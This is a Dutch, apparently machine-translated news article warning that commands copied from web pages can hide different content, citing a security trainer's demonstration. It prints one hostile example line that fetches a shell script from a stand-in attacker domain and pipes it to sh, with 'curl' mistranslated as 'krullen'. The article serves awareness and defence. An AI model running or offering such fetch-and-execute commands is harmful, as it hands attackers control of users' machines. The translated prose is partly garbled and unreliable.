- We kopiëren en plakken allemaal dagelijks van internet zonder de risico's te kennen.
- Een beveiligingsexpert nam daarbij de tijd om iedereen een worstcasescenario te laten zien.
- Opdrachten die u van internet hebt gekregen in uw terminal plakken, is een snelle manier om gehackt te worden
- De opdrachten die u dacht in uw terminal te plakken, zijn eigenlijk kwaadaardige codes.
Het is waar dat we in een tijdperk leven waarin snelheid alles is, en snelle resultaten behalen is het enige dat telt. Er zijn echter maar weinig mensen die echt een seconde stilstaan en nadenken over de gevolgen.
Dagelijks voeren miljoenen programmeurs, beheerders en beveiligingsonderzoekers eenvoudige taken uit, zoals het kopiëren en plakken van opdrachten van webpagina's rechtstreeks naar consoles op hun pc.
Hoewel velen hier niet eens over nadenken, zijn de implicaties groter en gevaarlijker dan je in eerste instantie zou denken, vooral als je gevoelige of waardevolle gegevens opslaat.
Een bekende beveiligingsexpert nam de tijd om te delen
wat kan er eigenlijk gebeuren? als u inhoud van webpagina's kopieert en plakt.Kopiëren + plakken is een gemakkelijke manier om daadwerkelijk gehackt te worden
Gabriel Friedlander, de oprichter van Wizer, het trainingsplatform voor beveiligingsbewustzijn, haalde de omslag van een schema waardoor je twee keer na moet denken voordat je opdrachten van webpagina's kopieert en plakt.
Het kopiëren en plakken van inhoud van internet is tegenwoordig zo gewoon geworden, dat niemand er zelfs maar over nadenkt.
Friedlander waarschuwt echter dat sommige webpagina's bedrieglijker zijn dan je in eerste instantie zou denken, en wat je denkt dat je ervan hebt gekopieerd, is heel anders dan wat je in werkelijkheid hebt gedaan.
En het ergste van dit alles is dat slachtoffers, zonder de nodige kennis of begeleiding, hun fout pas beseffen nadat ze de tekst hebben geplakt, waarna het misschien al te laat is.
De beveiligingsanalist bedacht ook een kleine test voor zijn bloglezers, zodat mensen echt kunnen begrijpen hoe gemakkelijk het voor u is om ongewild de deur open te zetten voor cybercriminelen.
Hij gaf een commando dat bedoeld is om te kopiëren, maar de betreffende waarheid komt pas aan het licht als je de tekst plakt en ziet wat je daadwerkelijk in je setup hebt geïntroduceerd.
Na het kopiëren van de opdracht die in de bovenstaande schermafbeelding wordt getoond, zal het resultaat van het plakken u schokken, omdat het verre van is wat u dacht dat u aan het dupliceren was.
krullen http://attacker-domain: 8000/shell.sh | shNaast het totaal andere commando dat op je klembord staat, is het newline-teken (of return-teken) bij het einde ervan betekent dat het bovenstaande voorbeeld wordt uitgevoerd zodra het rechtstreeks in een Linux wordt geplakt terminal.
U kunt dus maar beter bewust zijn van wat er werkelijk gebeurt en dit behandelen als een ernstig veiligheidsrisico. We zeggen niet dat alle websites schadelijke inhoud verbergen, maar het loont de moeite om hier rekening mee te houden.
Ben je ooit gehackt door onbetrouwbare commando's in je terminal te plakken? Deel uw ervaring met ons in de opmerkingen hieronder.
